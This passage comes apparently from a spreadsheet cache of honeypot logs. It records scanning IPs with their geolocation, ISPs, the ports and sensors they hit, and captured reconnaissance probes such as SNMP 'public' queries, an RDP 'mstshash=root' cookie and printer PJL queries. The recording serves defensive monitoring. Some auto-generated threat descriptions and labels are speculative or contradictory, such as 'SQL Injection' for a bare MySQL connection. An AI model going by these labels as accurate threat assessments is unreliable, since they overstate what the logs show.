    <s v="This indicates an attempt to connect to a telnet service, likely as part of a reconnaissance or brute-force attack._x000a_The attacker is probing for vulnerabilities in the service's authentication mechanisms._x000a_No further action was taken, suggesting the connection attempt was not successful. &amp;&amp; No TELNET activity detected, but this could be an attempt to exploit the service as there is no connection established or logged. This lack of activity might indicate that an attacker was trying to establish a session but failed to do so."/>
    <m/>
  </r>
  <r>
    <x v="454"/>
    <x v="454"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T09:11:47"/>
    <d v="2025-02-24T05:39:15"/>
    <d v="2025-04-29T09:11:47"/>
    <n v="22"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Email Spoofing&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_SNMP_H47"/>
    <s v="3306&amp;&amp;161&amp;&amp;445&amp;&amp;443&amp;&amp;3389&amp;&amp;80&amp;&amp;NA&amp;&amp;110"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="BE"/>
    <s v="Berlin"/>
    <s v="NA"/>
    <s v="Berlin (Bezirk Treptow-Köpenick)"/>
    <s v="2950159"/>
    <s v="12489"/>
    <s v="52.4286"/>
    <s v="13.531600000000001"/>
    <s v="208843"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="business"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="2005-09-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;GET&amp;&amp;stshash&amp;&amp;NA&amp;&amp;command"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SMB:Incoming connection (194.187.176.83,7998)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '156.244.37.11', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '38.60.209.6', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '144.126.148.5', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '95.164.118.29', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_SNMP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c2bb:b053"/>
    <s v="C-I"/>
    <s v="high&amp;&amp;medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="A possible attempt to initiate an SSL/TLS connection to test for vulnerabilities or gain unauthorized access. This could be part of a reconnaissance activity before attempting other malicious actions. It may also be a probing attempt to identify services with weak TLS configurations. &amp;&amp; The attacker is attempting to initiate an encrypted connection with a POP3 server, possibly trying to mask their activity or gain unauthorized access. This could be a step towards stealing sensitive email credentials. It may also indicate a reconnaissance phase before actual data exfiltration. &amp;&amp; There is insufficient information for analysis as there are no log entries provided."/>
    <s v="TLS Attack &amp;&amp; SSL Scan"/>
  </r>
  <r>
    <x v="455"/>
    <x v="455"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T09:10:37"/>
    <d v="2023-09-03T14:20:00"/>
    <d v="2025-04-29T09:10:37"/>
    <n v="1104"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_SSH_H11&amp;&amp;SMA-LAB_SSH_H41&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_RDP_H13&amp;&amp;SMA-LAB_MYSQL_H35&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_HTTPS_H35&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_SMTP_H13&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_MYSQL_H40"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;33867&amp;&amp;21&amp;&amp;22&amp;&amp;3389&amp;&amp;3306&amp;&amp;48594&amp;&amp;59554&amp;&amp;443&amp;&amp;8443&amp;&amp;25&amp;&amp;1080&amp;&amp;39617&amp;&amp;6379&amp;&amp;54151&amp;&amp;55315&amp;&amp;NA&amp;&amp;1433&amp;&amp;161&amp;&amp;143&amp;&amp;9100&amp;&amp;110&amp;&amp;5432&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Greater London"/>
    <s v="London"/>
    <s v="2643743"/>
    <s v="W1B"/>
    <s v="51.5072"/>
    <s v="-0.127586"/>
    <s v="135377"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="hosting"/>
    <s v="Ucloud Information Technology"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;NA&amp;&amp;connection&amp;&amp;query"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6524:61bb"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No analysis can be performed without log data."/>
    <m/>
  </r>
  <r>
    <x v="456"/>
    <x v="456"/>
    <s v="zl-dala-us-gp1-wk121b.internet-census.org&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T09:10:06"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T09:10:06"/>
    <n v="173"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_DNS_H17&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_IRC_H10&amp;&amp;SMA-LAB_POSTGRES_H4&amp;&amp;SMA-LAB_SIP_H39&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_POSTGRES_H2&amp;&amp;SMA-LAB_SIP_H47&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;21&amp;&amp;6379&amp;&amp;53&amp;&amp;19529&amp;&amp;6667&amp;&amp;NA&amp;&amp;161&amp;&amp;29419&amp;&amp;110&amp;&amp;9100&amp;&amp;389&amp;&amp;443&amp;&amp;23&amp;&amp;1521&amp;&amp;143&amp;&amp;24261&amp;&amp;38379&amp;&amp;29814"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="TX"/>
    <s v="Texas"/>
    <s v="Dallas"/>
    <s v="Dallas"/>
    <s v="4684888"/>
    <s v="75270"/>
    <s v="32.7767"/>
    <s v="-96.797"/>
    <s v="21859"/>
    <s v="Zenlayer Inc"/>
    <s v="Zenlayer Inc"/>
    <s v="business"/>
    <s v="ICG 1 ZEN DFW"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;NA&amp;&amp;query"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.2.0 1.3.6.1.2.1.1.3.0 1.3.6.1.2.1.1.4.0 1.3.6.1.2.1.1.5.0 1.3.6.1.2.1.1.6.0 1.3.6.1.2.1.1.7.0', 'version': '1'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'CHKO0'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_@PJL INFO ID_x000d__x000a_@PJL INFO PRODINFO_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9b4:8d0d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="457"/>
    <x v="457"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T08:44:06"/>
    <d v="2025-04-29T08:44:06"/>
    <d v="2025-04-29T08:44:06"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:30b7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="458"/>
    <x v="458"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T08:25:39"/>
    <d v="2023-07-24T17:11:49"/>
    <d v="2025-04-29T08:25:39"/>
    <n v="96847"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="23&amp;&amp;51412&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d7:85d5"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="459"/>
    <x v="459"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T08:23:36"/>
    <d v="2025-04-24T07:31:47"/>
    <d v="2025-04-29T08:23:36"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits'&amp;&amp; 'unknown']}"/>
    <n v="112"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Đống Đa District"/>
    <s v="Láng Thượng"/>
    <s v="12808882"/>
    <s v="NA"/>
    <s v="21.0237"/>
    <s v="105.804"/>
    <s v="18403"/>
    <s v="FPT Telecom Company"/>
    <s v="FPT Telecom Company"/>
    <s v="business"/>
    <s v="FPTDYNAMICIP"/>
    <s v="2011-02-10"/>
    <s v="FPTDYNAMICIP-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2a75:9580"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The system was scanned for potential vulnerabilities, specifically targeting MySQL databases. The scanner likely sent a probe or attempted connection to identify exposed services. No malicious activity occurred as the scan did not result in any further action."/>
    <s v="SQL Injection"/>
  </r>
  <r>
    <x v="460"/>
    <x v="460"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T08:11:01"/>
    <d v="2024-12-11T18:46:26"/>
    <d v="2025-04-29T08:11:01"/>
    <n v="19"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda"/>
    <s v="11749713"/>
    <s v="100-8111"/>
    <s v="35.6906"/>
    <s v="139.77"/>
    <s v="138384"/>
    <s v="Rakuten Mobile, Inc."/>
    <s v="Rakuten Mobile, Inc."/>
    <s v="cellular"/>
    <s v="RMN"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:856a:6625"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="461"/>
    <x v="461"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T08:10:22"/>
    <d v="2024-06-27T18:38:56"/>
    <d v="2025-04-29T08:10:22"/>
    <n v="3153"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_SSH_H2&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_IMAP_H4"/>
    <s v="1080&amp;&amp;48649&amp;&amp;22&amp;&amp;35565&amp;&amp;110&amp;&amp;143&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="CN"/>
    <s v="China"/>
    <s v="JS"/>
    <s v="Jiangsu"/>
    <s v="Taizhou Shi"/>
    <s v="Taizhou (Jingjiang Shi)"/>
    <s v="1793505"/>
    <s v="NA"/>
    <s v="32.0149"/>
    <s v="120.275"/>
    <s v="132883"/>
    <s v="Hong Kong San Ai Net Int'l Limited"/>
    <s v="Hong Kong San Ai Net Int'l Limited"/>
    <s v="business"/>
    <s v="Jiangsu Sanai network science and technology co, LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POP3:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cb53:b92"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="462"/>
    <x v="462"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T08:05:00"/>
    <d v="2025-01-13T06:58:39"/>
    <d v="2025-04-29T08:05:00"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H24"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JI"/>
    <s v="East Java"/>
    <s v="Kabupaten Lamongan"/>
    <s v="Ngaglik Timur"/>
    <s v="7036672"/>
    <s v="NA"/>
    <s v="-7.12184"/>
    <s v="112.415"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Dinas Komunikasi dan Informatika Kabupaten Lamongan"/>
    <s v="business"/>
    <s v="Dinas Komunikasi dan Informatika Kabupaten Lamongan"/>
    <s v="2024-03-09"/>
    <s v="IDNIC-LAMONGANKAB-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (157.20.189.18,64987)}&amp;&amp;{Data_SMB:Incoming connection (157.20.189.18,65306)}&amp;&amp;{Data_SMB:Incoming connection (157.20.189.18,62343)}&amp;&amp;{Data_SMB:Incoming connection (157.20.189.18,62882)}&amp;&amp;{Data_SMB:Incoming connection (157.20.189.18,57235)}&amp;&amp;{Data_SMB:Incoming connection (157.20.189.18,54240)}&amp;&amp;{Data_SMB:Incoming connection (157.20.189.18,59212)}&amp;&amp;{Data_SMB:Incoming connection (157.20.189.18,61127)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9d14:bd12"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="A potential malicious SMB client has connected to an exposed service, attempting unauthorized access from IP address 157.20.189.18 using an unusual source port of 61127. This could be a reconnaissance or attack attempt. The unusual port number suggests the activity may not be legitimate. &amp;&amp; Incoming SMB connection attempt from IP address 157.20.189.18 on port 61127 may be a scanning or reconnaissance activity trying to exploit vulnerabilities in network services. This could be an initial step for potential data exfiltration or further malicious actions. The unknown client's presence suggests suspicious intent."/>
    <s v="Port Scan &amp;&amp; SMB Brute Force"/>
  </r>
  <r>
    <x v="463"/>
    <x v="463"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T07:49:32"/>
    <d v="2025-04-29T07:49:32"/>
    <d v="2025-04-29T07:49:32"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Bārdoli"/>
    <s v="1277022"/>
    <s v="NA"/>
    <s v="21.123"/>
    <s v="73.1115"/>
    <s v="132761"/>
    <s v="Smartlink-AS-IN"/>
    <s v="Smartlink Solutions"/>
    <s v="corporate"/>
    <s v="Smartlink Solutions"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67f9:1a3e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="464"/>
    <x v="464"/>
    <s v="NA&amp;&amp;60-251-194-108.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-29T07:10:57"/>
    <d v="2024-12-02T22:05:36"/>
    <d v="2025-04-29T07:10:57"/>
    <n v="35"/>
    <s v="SQTK_GTDN"/>
